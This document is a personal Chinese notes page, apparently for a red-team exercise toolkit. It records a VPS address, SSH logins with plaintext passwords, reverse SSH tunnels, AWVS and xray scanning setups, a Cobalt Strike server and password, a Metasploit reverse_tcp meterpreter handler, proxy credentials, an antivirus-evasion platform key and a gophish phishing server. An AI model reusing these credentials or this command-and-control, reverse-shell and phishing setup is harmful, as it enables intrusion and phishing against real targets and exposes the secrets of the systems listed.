自用hw工具合集

公网地址

硬件设施

台式电脑kali 虚拟机
blueLight的内网服务器

ssh

ssh root@43.138.35.188 -p 13323

192.168.18.38
ssh user: root
password: AB-0C-E9-7D-30-3E

cd /root/Documents
ssh -fgN -R 13322:127.0.0.1:22 root@43.138.35.188 -i id_rsa
将本地192.168.18.38的22端口转发到vps 43.138.35.188的13322端口

漏扫 AWVS

开启docker环境,访问127.0.0.1的对应端口,服务能够正常访问,于是端口转发到VPS

ssh -fgN -R 13443:127.0.0.1:13443 root@43.138.35.188 -i id_rsa

本地访问:https://192.168.18.38:13443/#/login

远程访问:https://43.138.35.188:13343/#/login

admin@admin.com
NScdX.*z?Qf9

https://github.com/test502git/awvs14-scan

自动添加url.txt到awvs

2024.7更新

最近买了一个叫做blueLight的内网服务器,价格1000元左右。
在此服务器上搭建awvs漏扫
docker run -it -d -p 13443:3443 –cap-add LINUX_IMMUTABLE secfa/docker-awvs

参考资料:https://hub.docker.com/r/secfa/docker-awvs
Username:admin@admin.com
password:Admin123
AWVS Version:231123131
内网登录:https://192.168.5.1:13443/#/dashboard

一看版本太老,于是重新下载一个docker pull 0xgkd/awvs
docker run -it -d -p 13443:3443 0xgkd/awvs
username: admin@gkd.com
password: Oxgkd123
参考资料:https://github.com/0xgkd/awvs

AWVS + xray

https://github.com/test502git/awvs14-scan

python3 awvs14_script.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
初始化中~
配置正确~
扫描中: 0 等待扫描: 0 已扫描: 0 漏洞总数: {'crit': None, 'high': None, 'low': None, 'med': None}
主要漏洞

********************************************************************
AWVS14 批量添加,批量扫描,支持awvs14批量联动被动扫描器等功能

作者微信:SRC-ALL
********************************************************************
1 【批量添加url到AWVS扫描器扫描】
2 【删除扫描器内所有目标与扫描任务】
3 【删除所有扫描任务(不删除目标)】
4 【对扫描器中已有目标,进行扫描】
5 【高危漏洞消息推送】 企业微信机器人
6 【删除已扫描完成的目标】

请输入数字:

选择1【批量添加url到AWVS扫描器扫描】
6 【开始 Crawl Only,,建议config.ini配置好上级代理地址,联动被动扫描器】
扫描的结果在台式机kali虚拟机
路径是/pentest/intelligence-gathering/xray/
如果没有 xray-awvs-out.html 就说明没扫到漏洞

cobaltstrike

43.138.35.188
8080
AB-0C-E9-7D-30-3E

metasploit

handler -H 192.168.18.38 -P 8080 -p windows/x64/meterpreter/reverse_tcp_rc4

xray

ssh root@192.168.18.38

qwf123!

使用fofasearch命令,输入base64的搜索语法,即可保存到target.txt

然后输入xrayscan,输入poc的地址

如果是单个poc,需要指定poc的绝对路径

如果是所有poc,可以指定为”/pentest/intelligence-gathering/xray/pocs/*”

xray reverse

http://104.244.94.211:65534/cland/#/
http://qstf5588nhst.xyz:65534/cland/

token:
0388C634D9CAB99314EB6CCE7E94FAF8

xmap

XMap资产探测平台:http://39.105.104.102/
401认证账号密码:scaner / 9f4ZWHqKb0BaPmXl
平台账号密码:- / BbVi1DychXQ2MA7I

proxifier

curl -U alph4Nus:M4tri5Ph3 –socks5 143.198.58.18:38192 cip.cc

参考资料

自动免杀平台

how to use
IeeaTJNlpZCYpZ2JMEM2

进程识别

https://forum.ywhack.com/bountytips.php?process

gophish

https://43.138.35.188:8333/login?next=%2F
POC编写之刷分大法 https://zhuanlan.zhihu.com/p/330476648